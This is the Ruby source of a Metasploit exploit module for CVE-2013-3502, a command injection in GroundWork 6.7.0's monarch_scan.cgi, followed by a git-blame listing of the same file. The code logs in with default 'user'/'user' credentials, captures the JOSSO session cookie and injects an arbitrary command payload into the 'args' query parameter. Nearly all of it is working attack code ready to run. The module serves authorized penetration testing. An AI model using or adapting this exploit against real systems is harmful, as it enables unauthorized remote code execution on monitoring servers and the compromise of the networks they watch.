modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "GroundWork monarch_scan.cgi OS Command Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in GroundWork 6.7.0. This software
        is used for network, application and cloud monitoring. The vulnerability exists in
        the monarch_scan.cgi where user controlled input is used in the perl qx function.
        This allows any remote authenticated attacker, regardless of privileges, to
        inject system commands and gain arbitrary code execution. The module has been tested
        successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04
        based VM appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Johannes Greil', # Vulnerability Discovery, PoC
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3502' ],
          [ 'OSVDB', '91051' ],
          [ 'US-CERT-VU', '345260' ],
          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
        ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 8190,
          'DisableNops' => true,
          'Compat'          =>
            {
              'PayloadType' => 'cmd',
              # Based on the default Ubuntu 10.04 VM appliance
              'RequiredCmd' => 'generic telnet netcat perl python'
            },
        },
      'Platform'       => %w{ linux unix },
      'Targets'        =>
        [
          ['GroundWork 6.7.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-03-08',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('USERNAME',  [true, 'GroundWork Username', 'user']),
          OptString.new('PASSWORD',  [true, 'GroundWork Password', 'user'])
        ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("josso", "signon", "login.do")
    })

    if res and res.body =~ /GroundWork.*6\.7\.0/
      return Exploit::CheckCode::Appears
    elsif res and res.body =~ /GroundWork/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def get_josso_token
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),
      'vars_post' => {
        'josso_cmd'      => 'login',
        'josso_username' => datastore['USERNAME'],
        'josso_password' => datastore['PASSWORD']
      }
    })
    if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
      return $1
    else
      return nil
    end
  end

  def execute_command(command)
    http_handler = ((datastore['SSL']) ? "https" : "http")
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri("monarch", "monarch_scan.cgi"),
      'headers'   =>
        {
          'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"
        },
      'cookie'    => "JOSSO_SESSIONID=#{@josso_id}",
      'query'     => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"
    })
    return res
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    print_status("Attempting to login...")
    @josso_id = get_josso_token
    if @josso_id.nil?
      fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")
    end
    print_good("Authentication successful")

    print_status("Sending malicious request...")
    execute_command(payload.encoded)
  end
end
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`Rank = ExcellentRanking`

			`HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "GroundWork monarch_scan.cgi OS Command Injection",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in GroundWork 6.7.0. This software`
			`is used for network, application and cloud monitoring. The vulnerability exists in`
Trivial description cleanup 2013-04-29 14:11:20 -05:00			`the monarch_scan.cgi where user controlled input is used in the perl qx function.`
			`This allows any remote authenticated attacker, regardless of privileges, to`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`inject system commands and gain arbitrary code execution. The module has been tested`
			`successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04`
			`based VM appliance.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Johannes Greil', # Vulnerability Discovery, PoC`
			`'juan vazquez' # Metasploit module`
			`],`
			`'References' =>`
			`[`
CVE and OSVDB update 2013-06-25 02:06:20 -05:00			`[ 'CVE', '2013-3502' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '91051' ],`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`[ 'US-CERT-VU', '345260' ],`
			`[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]`
			`],`
Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00			`'Arch' => ARCH_CMD,`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`'Payload' =>`
			`{`
			`'Space' => 8190,`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00			`'PayloadType' => 'cmd',`
			`# Based on the default Ubuntu 10.04 VM appliance`
			`'RequiredCmd' => 'generic telnet netcat perl python'`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`},`
			`},`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux unix },`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`'Targets' =>`
			`[`
			`['GroundWork 6.7.0', {}]`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2013-03-08',`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('USERNAME', [true, 'GroundWork Username', 'user']),`
			`OptString.new('PASSWORD', [true, 'GroundWork Password', 'user'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`end`

			`def check`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri("josso", "signon", "login.do")`
			`})`

			`if res and res.body =~ /GroundWork.*6\.7\.0/`
			`return Exploit::CheckCode::Appears`
			`elsif res and res.body =~ /GroundWork/`
			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`def get_josso_token`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),`
			`'vars_post' => {`
			`'josso_cmd' => 'login',`
			`'josso_username' => datastore['USERNAME'],`
			`'josso_password' => datastore['PASSWORD']`
			`}`
			`})`
Resolved some more Set-Cookie warnings 2014-05-13 22:56:12 +02:00			`if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`return $1`
			`else`
			`return nil`
			`end`
			`end`

			`def execute_command(command)`
			`http_handler = ((datastore['SSL']) ? "https" : "http")`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri("monarch", "monarch_scan.cgi"),`
			`'headers' =>`
			`{`
			`'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"`
			`},`
			`'cookie' => "JOSSO_SESSIONID=#{@josso_id}",`
			`'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"`
			`})`
			`return res`
			`end`

			`def exploit`
			`peer = "#{rhost}:#{rport}"`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Attempting to login...")`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`@josso_id = get_josso_token`
			`if @josso_id.nil?`
Switch to Failure vs Exploit::Failure 2013-08-15 14:14:46 -05:00			`fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`end`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good("Authentication successful")`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Sending malicious request...")`
Add module for US-CERT-VU 345260 2013-04-23 19:09:28 -05:00			`execute_command(payload.encoded)`
			`end`
			`end`